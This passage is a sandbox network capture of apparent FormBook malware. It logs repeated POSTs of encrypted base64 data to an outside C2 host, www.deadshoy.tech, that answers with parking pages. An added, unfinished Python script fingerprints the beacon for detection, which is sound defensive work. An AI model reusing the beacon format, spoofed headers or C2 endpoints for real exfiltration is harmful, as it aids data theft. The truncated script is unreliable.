                                                        date: Tue, 10 Dec 2024 17:49:19 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1446
                                                        x-request-id: 0b2e3524-34d5-4c81-8ae9-163fb9679ae4
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fm3qWo90fKnLEGfOVLOmKtzFuQlP8FVEaCBuHYVl0BJiGqSmKa2LblUxulz3XW0PbfcUOGd6sHiwarkcaEeWDA==
                                                        set-cookie: parking_session=0b2e3524-34d5-4c81-8ae9-163fb9679ae4; expires=Tue, 10 Dec 2024 18:04:19 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 6d 33 71 57 6f 39 30 66 4b 6e 4c 45 47 66 4f 56 4c 4f 6d 4b 74 7a 46 75 51 6c 50 38 46 56 45 61 43 42 75 48 59 56 6c 30 42 4a 69 47 71 53 6d 4b 61 32 4c 62 6c 55 78 75 6c 7a 33 58 57 30 50 62 66 63 55 4f 47 64 36 73 48 69 77 61 72 6b 63 61 45 65 57 44 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fm3qWo90fKnLEGfOVLOmKtzFuQlP8FVEaCBuHYVl0BJiGqSmKa2LblUxulz3XW0PbfcUOGd6sHiwarkcaEeWDA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                         Dec 10, 2024 18:49:19.804924965 CET | 846 | IN | Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGIyZTM1MjQtMzRkNS00YzgxLThhZTktMTYzZmI5Njc5YWU0IiwicGFnZV90aW1lIjoxNzMzODUyOTU5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZG5mdC5pbW1vL3lla3k


                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                         13 | 192.168.11.20 | 49768 | 199.59.243.227 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                         Timestamp | Bytes transferred | Direction | Data
                                                         Dec 10, 2024 18:49:25.116887093 CET | 708 | OUT | POST /0sq9/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 199
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.deadshoy.tech
                                                        Origin: http://www.deadshoy.tech
                                                        Referer: http://www.deadshoy.tech/0sq9/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 39 42 45 4d 67 54 6a 6d 69 2b 41 36 39 6c 51 6a 31 4a 44 2b 75 77 59 38 38 64 7a 6e 5a 50 37 63 66 56 71 6e 62 4b 73 75 59 6a 67 74 56 69 4d 69 76 67 71 39 6a 39 42 33 61 64 72 48 49 4f 55 4f 2b 30 59 36 57 6a 4b 4f 59 4b 7a 68 4c 34 5a 75 2b 75 36 52 37 33 6d 6e 46 34 4c 51 4c 76 69 52 6b 47 32 36 4f 6e 77 45 6a 75 69 6b 76 4a 72 49 31 71 53 34 44 39 69 77 2b 65 57 70 6c 56 6c 72 58 62 71 53 2b 68 34 59 64 2b 4c 31 67 73 6c 31 6c 75 45 42 55 78 69 65 37 69 4c 75 4b 38 65 42 65 48 7a 52 53 75 4a 70 58 43 4f 46 6f 41 78 76 79 38 62 46 50 69 33 4d 37 56 4d 6a 2b 66 4d 74 4a 51 3d 3d
                                                        Data Ascii: QT=9BEMgTjmi+A69lQj1JD+uwY88dznZP7cfVqnbKsuYjgtViMivgq9j9B3adrHIOUO+0Y6WjKOYKzhL4Zu+u6R73mnF4LQLviRkG26OnwEjuikvJrI1qS4D9iw+eWplVlrXbqS+h4Yd+L1gsl1luEBUxie7iLuK8eBeHzRSuJpXCOFoAxvy8bFPi3M7VMj+fMtJQ==
                                                         Dec 10, 2024 18:49:25.252270937 CET | 1289 | IN | HTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:24 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1122
                                                        x-request-id: c131e8e5-4845-4c8e-8a5f-a5f8baba5c30
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==
                                                        set-cookie: parking_session=c131e8e5-4845-4c8e-8a5f-a5f8baba5c30; expires=Tue, 10 Dec 2024 18:04:25 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 33 5a 6a 61 39 35 78 34 31 71 56 2f 31 71 34 36 62 30 74 79 75 74 50 55 71 4f 59 78 75 54 5a 74 33 76 4d 35 6b 37 44 45 65 70 36 62 73 34 54 79 33 56 32 6b 45 33 30 68 6d 32 48 4a 49 61 59 6c 39 62 64 77 48 51 6d 66 54 61 30 6e 44 49 62 73 32 73 4b 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                         Dec 10, 2024 18:49:25.252481937 CET | 522 | IN | Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzEzMWU4ZTUtNDg0NS00YzhlLThhNWYtYTVmOGJhYmE1YzMwIiwicGFnZV90aW1lIjoxNzMzODUyOTY1LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZGVhZHNob3kudGVjaC8


                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                         14 | 192.168.11.20 | 49769 | 199.59.243.227 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                         Timestamp | Bytes transferred | Direction | Data
                                                         Dec 10, 2024 18:49:27.773057938 CET | 728 | OUT | POST /0sq9/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 219
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.deadshoy.tech
                                                        Origin: http://www.deadshoy.tech
                                                        Referer: http://www.deadshoy.tech/0sq9/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 39 42 45 4d 67 54 6a 6d 69 2b 41 36 2f 47 49 6a 30 72 72 2b 2f 51 59 7a 77 39 7a 6e 57 76 37 51 66 56 57 6e 62 4f 31 72 66 56 49 74 4d 48 6f 69 67 42 71 39 6d 39 42 33 55 39 72 43 46 75 55 4a 2b 30 63 49 57 6d 79 4f 59 4b 6e 68 4c 39 6c 75 2f 66 36 53 30 48 6d 68 4e 59 4c 46 47 50 69 52 6b 47 32 36 4f 6e 6c 4d 6a 76 47 6b 75 35 62 49 6b 2f 2b 37 50 64 69 2f 37 65 57 70 33 6c 6c 33 58 62 71 4b 2b 6b 67 79 64 38 44 31 67 74 56 31 6c 61 6f 4f 65 78 69 51 6d 79 4b 69 42 4f 72 4a 65 48 4b 6e 55 74 6c 49 53 6a 66 39 67 32 38 31 76 4f 76 68 4d 78 72 2b 2f 6c 31 4c 38 64 4e 32 55 62 35 59 34 37 6e 6e 2b 51 46 63 31 37 73 68 2b 5a 58 63 37 74 45 3d
                                                        Data Ascii: QT=9BEMgTjmi+A6/GIj0rr+/QYzw9znWv7QfVWnbO1rfVItMHoigBq9m9B3U9rCFuUJ+0cIWmyOYKnhL9lu/f6S0HmhNYLFGPiRkG26OnlMjvGku5bIk/+7Pdi/7eWp3ll3XbqK+kgyd8D1gtV1laoOexiQmyKiBOrJeHKnUtlISjf9g281vOvhMxr+/l1L8dN2Ub5Y47nn+QFc17sh+ZXc7tE=
                                                         Dec 10, 2024 18:49:27.908334970 CET | 1289 | IN | HTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:27 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1122
                                                        x-request-id: c87c72c2-9440-42cc-9d09-e09d31a1c5cd
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==
                                                        set-cookie: parking_session=c87c72c2-9440-42cc-9d09-e09d31a1c5cd; expires=Tue, 10 Dec 2024 18:04:27 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 33 5a 6a 61 39 35 78 34 31 71 56 2f 31 71 34 36 62 30 74 79 75 74 50 55 71 4f 59 78 75 54 5a 74 33 76 4d 35 6b 37 44 45 65 70 36 62 73 34 54 79 33 56 32 6b 45 33 30 68 6d 32 48 4a 49 61 59 6c 39 62 64 77 48 51 6d 66 54 61 30 6e 44 49 62 73 32 73 4b 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                         Dec 10, 2024 18:49:27.908508062 CET | 522 | IN | Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzg3YzcyYzItOTQ0MC00MmNjLTlkMDktZTA5ZDMxYTFjNWNkIiwicGFnZV90aW1lIjoxNzMzODUyOTY3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZGVhZHNob3kudGVjaC8


                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                         15 | 192.168.11.20 | 49770 | 199.59.243.227 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                         Timestamp | Bytes transferred | Direction | Data
                                                         Dec 10, 2024 18:49:30.428957939 CET | 1289 | OUT | POST /0sq9/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 7367
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.deadshoy.tech
                                                        Origin: http://www.deadshoy.tech
                                                        Referer: http://www.deadshoy.tech/0sq9/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 39 42 45 4d 67 54 6a 6d 69 2b 41 36 2f 47 49 6a 30 72 72 2b 2f 51 59 7a 77 39 7a 6e 57 76 37 51 66 56 57 6e 62 4f 31 72 66 56 77 74 51 6b 51 69 76 43 53 39 68 39 42 33 63 64 72 44 46 75 55 59 2b 77 77 4d 57 6d 33 37 59 49 66 68 4b 66 64 75 34 72 75 53 76 33 6d 68 53 6f 4c 52 4c 76 69 45 6b 47 47 2b 4f 6e 31 4d 6a 76 47 6b 75 36 54 49 6b 71 53 37 4a 64 69 77 2b 65 57 74 6c 56 6c 54 58 62 69 30 2b 6c 77 49 64 49 50 31 67 4f 39 31 6e 50 45 4f 57 78 69 53 6c 79 4c 2f 42 4f 33 47 65 47 6e 59 55 73 52 79 53 68 2f 39 6a 58 6c 31 33 74 50 68 53 54 6e 52 2b 55 4a 4d 72 4f 52 62 62 34 68 69 30 59 50 6c 2b 56 6c 32 79 59 67 32 36 61 44 41 35 72 43 5a 37 79 67 6b 48 65 51 6a 66 57 61 43 4a 55 70 4d 6e 56 47 69 39 53 35 6c 4d 7a 34 37 4c 4d 4c 65 78 6b 74 32 5a 65 74 6d 4e 2f 63 51 4f 6d 30 50 58 54 6e 32 45 43 67 7a 7a 5a 6a 53 78 69 43 2b 6d 52 39 74 61 6f 70 45 32 39 64 6d 75 46 45 59 35 45 77 51 6a 73 36 6f 6c 31 33 71 4c 4f 68 62 2f 69 6e 4c 58 71 4d 41 68 43 6c 65 2b 6b 62 75 66 41 79 70 44 4f 76 [TRUNCATED]
                                                         Data Ascii: QT=9BEMgTjmi+A6/GIj0rr+/QYzw9znWv7QfVWnbO1rfVwtQkQivCS9h9B3cdrDFuUY+wwMWm37YIfhKfdu4ruSv3mhSoLRLviEkGG+On1MjvGku6TIkqS7Jdiw+eWtlVlTXbi0+lwIdIP1gO91nPEOWxiSlyL/BO3GeGnYUsRySh/9jXl13tPhSTnR+UJMrORbb4hi0YPl+Vl2yYg26aDA5rCZ7ygkHeQjfWaCJUpMnVGi9S5lMz47LMLexkt2ZetmN/cQOm0PXTn2ECgzzZjSxiC+mR9taopE29dmuFEY5EwQjs6ol13qLOhb/inLXqMAhCle+kbufAypDOv [TRUNCATED]
                                                         Dec 10, 2024 18:49:30.429029942 CET | 3867 | OUT | Data Raw: 49 58 58 62 6e 5a 68 48 57 42 6c 69 6d 6b 56 42 6d 56 5a 4d 41 67 75 46 59 4e 76 49 6e 2b 4b 68 4d 42 58 35 74 55 65 51 72 76 6d 31 7a 77 6d 53 4f 71 47 6a 66 2b 73 79 56 6b 57 2b 34 56 76 76 61 73 4f 31 6f 37 55 6f 6d 37 44 6c 73 69 38 74 52 48
                                                        Data Ascii: IXXbnZhHWBlimkVBmVZMAguFYNvIn+KhMBX5tUeQrvm1zwmSOqGjf+syVkW+4VvvasO1o7Uom7Dlsi8tRHuEA7+O8QohpSd+tMJYVhNE3SgoX3ANZEB3PGwlfElUODhp4yYDUP91CEdz3hahsQgRNkYOIOdgzgN+5+KyWxtspCPVJPmQGES4FkfUeDGrUqLEiBnWUxJWQ+MSuECHotnlnEtCcAvV87hGicG5IQPxp97aknTtlIr
                                                         Dec 10, 2024 18:49:30.429053068 CET | 2721 | OUT | Data Raw: 76 78 53 55 78 41 64 66 73 76 64 59 61 58 75 71 37 77 63 6b 51 44 61 6c 48 47 50 68 75 65 51 4a 6c 30 47 4f 73 2f 74 49 35 49 2f 62 4c 72 5a 4a 56 4f 5a 61 48 36 53 47 4e 66 64 6f 6e 4a 68 64 37 67 49 6e 6a 7a 4b 50 59 78 62 47 77 33 54 58 4d 36
                                                        Data Ascii: vxSUxAdfsvdYaXuq7wckQDalHGPhueQJl0GOs/tI5I/bLrZJVOZaH6SGNfdonJhd7gInjzKPYxbGw3TXM6pdCT8fugK/WB5gmWhhZHdtHL6oNmjsk/s/xnX7UPjHKyGowzcueFJCN7CPfgNX+bupjj4KZ/J9EKA+HF/T7ye1XAGi2Ow9CKM7DzCJwobcI86zyrLLNl/go7M7yGNAvV7kljR+QM/rdELkn1cMf+gQj1YvkBSHKac
                                                         Dec 10, 2024 18:49:30.565650940 CET | 1289 | IN | HTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:29 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1122
                                                        x-request-id: 7c4b7385-1fb3-42be-be61-89f8dfea47a1
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==
                                                        set-cookie: parking_session=7c4b7385-1fb3-42be-be61-89f8dfea47a1; expires=Tue, 10 Dec 2024 18:04:30 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 33 5a 6a 61 39 35 78 34 31 71 56 2f 31 71 34 36 62 30 74 79 75 74 50 55 71 4f 59 78 75 54 5a 74 33 76 4d 35 6b 37 44 45 65 70 36 62 73 34 54 79 33 56 32 6b 45 33 30 68 6d 32 48 4a 49 61 59 6c 39 62 64 77 48 51 6d 66 54 61 30 6e 44 49 62 73 32 73 4b 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                         Dec 10, 2024 18:49:30.565660000 CET | 522 | IN | Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2M0YjczODUtMWZiMy00MmJlLWJlNjEtODlmOGRmZWE0N2ExIiwicGFnZV90aW1lIjoxNzMzODUyOTcwLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZGVhZHNob3kudGVjaC8
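
The sessions above all share one request shape, and it is worth turning into detection logic. What follows is an added example, not part of the Joe Sandbox report and not FormBook tooling: it parses raw HTTP request/response pairs modelled on the captured sessions and scores the beacon fingerprint visible here: the spoofed "Firefox 27 on Mac OS X 10.10" User-Agent, a single short path segment (/yeky/, /0sq9/), Connection: close together with Cache-Control: no-cache, Origin and Referer forged to the target host so the upload passes as a same-site form post, and either a form-encoded POST carrying one base64 field or a GET whose query holds one base64 blob plus a short token (LLp=-2JPqdjXxxH4, identical in both captured GETs). It also classifies the replies: every response in this capture is a domain-parking page (parking_session cookie, x-adblock-key header, window.park bootstrap), so neither www.dnft.immo nor www.deadshoy.tech answered as a live C2 during this run. Assumptions: the sample records are constructed (hosts, paths, User-Agent, field names and one POST body taken from the capture; the benign control request, the shortened parking reply and the three-indicator threshold are invented for illustration), and the UA string and the QT/LLp names are treated as specific to this sample rather than constants of the family.

```python
"""Triage of FormBook-style HTTP beacons over raw request/response pairs.
Added example, not part of the Joe Sandbox report. SAMPLE_SESSIONS is constructed:
hosts, paths, User-Agent, QT/LLp field names and one POST body come from the
capture; the benign control record and the shortened parking reply are invented."""
import re

# Carried by every request in this capture. Assumed sample-specific, not a family constant.
FORMBOOK_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) "
               "Gecko/20100101 Firefox/27.0")
C2_PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")      # /yeky/, /0sq9/
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")     # encrypted, base64-encoded blob
SHORT_ID_RE = re.compile(r"^-?[A-Za-z0-9+/]{4,16}$")   # e.g. LLp=-2JPqdjXxxH4
BEACON_THRESHOLD = 3                                   # arbitrary choice for illustration


def parse_http(raw: str):
    """Split a raw HTTP/1.1 message into (start_line, headers, body).
    Header names are lower-cased; the first occurrence wins on duplicates."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    return start, headers, body


def split_form(data: str) -> dict:
    """k=v&k=v splitter that does NOT decode '+' or '%xx': urllib's parse_qs
    would turn every '+' of the base64 blob into a space and defeat matching."""
    pairs = (p.partition("=") for p in data.split("&") if p)
    return {k: v for k, _, v in pairs}


def request_indicators(raw: str) -> list:
    """Names of the beacon indicators one request matches; [] for ordinary traffic."""
    start, hdr, body = parse_http(raw)
    method, target, _ = start.split(" ", 2)
    path, _, query = target.partition("?")
    host = hdr.get("host", "")
    hits = []
    if hdr.get("user-agent") == FORMBOOK_UA:
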